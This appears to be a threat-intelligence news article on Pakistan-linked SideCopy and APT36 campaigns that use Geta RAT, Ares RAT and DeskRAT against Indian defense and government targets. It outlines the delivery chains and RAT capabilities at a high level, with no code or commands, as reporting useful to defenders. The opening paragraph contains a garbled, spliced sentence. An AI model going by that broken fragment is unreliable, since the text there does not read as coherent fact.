Numerous campaigns aimed at infiltrating Windows and Linux environments with remote access trojans that can steal confidential information and guarantee ongoing access to compromised machines have targeted the Indian defense industry and government-affiliated organizations This article explores campaigns resourced espionage. . Malware families like Geta RAT, Ares RAT, and DeskRAT are used in the campaigns; these are frequently linked to threat clusters associated with Pakistan, such as SideCopy and APT36 (also known as Transparent Tribe).

SideCopy, which has been in operation since at least 2019, is evaluated as functioning as a Transparent Tribe subsidiary. Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka, stated that when taken as a whole, these campaigns "reinforce a familiar but evolving narrative."

"SideCopy and Transparent Tribe are improving espionage, not creating it from scratch." "This ecosystem continues to function below the noise floor while retaining strategic focus by extending cross-platform coverage, relying on memory-resident techniques, and experimenting with new delivery vectors." Phishing emails with malicious attachments or embedded download links that direct potential targets to infrastructure under the control of the attacker are a common feature of all the campaigns.

These first access methods act as a conduit for PowerPoint Add-In files, ELF binaries, and Windows shortcuts (LNK), which, when accessed, initiate a multi-step procedure that releases the trojans. The malware families are made to operate in both Windows and Linux environments, allowing for persistent remote access, system reconnaissance, data collection, command execution, and long-term post-compromise operations.

The following is one of the attack chains: an HTML Application (HTA) file hosted on compromised legitimate domains is executed by a malicious LNK file that calls "mshta.exe." JavaScript is used in the HTA payload to decrypt an embedded DLL payload. This payload then processes an embedded data blob to write a decoy PDF to disk, connects to a hard-coded command-and-control (C2) server, and shows the saved decoy file.

Before launching Geta RAT on the compromised host, the malware first determines whether any security products have been installed after the lure document is displayed, then modifies its persistence strategy accordingly. It's important to note that in late December 2025, researcher Sathwik Ram Prakki of CYFIRMA and Seqrite Labs described this attack chain.

To gather system information, list installed apps, terminate a specific process, enumerate running processes, retrieve and replace clipboard contents with attacker-supplied data, take screenshots, execute arbitrary shell commands, run file operations, and harvest data from connected USB devices, Geta RAT supports a number of commands. A Linux variant of this Windows-focused campaign uses a shell script downloaded from an external server to drop a Python-based Ares RAT, using a Go binary as a starting point. Similar to Geta RAT, Ares RAT can execute a variety of commands to run Python scripts or commands from the threat actor and harvest sensitive data.

According to Aryaka, it also noticed another campaign in which the Golang malware, DeskRAT, is distributed through a malicious PowerPoint Add-In file that launches an embedded macro to connect to a distant server and retrieve the malware. In October 2025, Sekoia and QiAnXin XLab documented how DeskRAT was used by APT36. According to the company, "these campaigns show a well-resourced, espionage-focused threat actor purposefully targeting Indian defense, government, and strategic sectors through defense-themed lures, impersonated official documents, and regionally trusted infrastructure."

"The activity encompasses not only defense but also critical infrastructure, research, policy, and defense-related organizations functioning within the same trusted ecosystem." "Desk RAT's deployment, along with Geta RAT and Ares RAT, highlights an evolving toolkit optimized for long-term access, stealth, and persistence."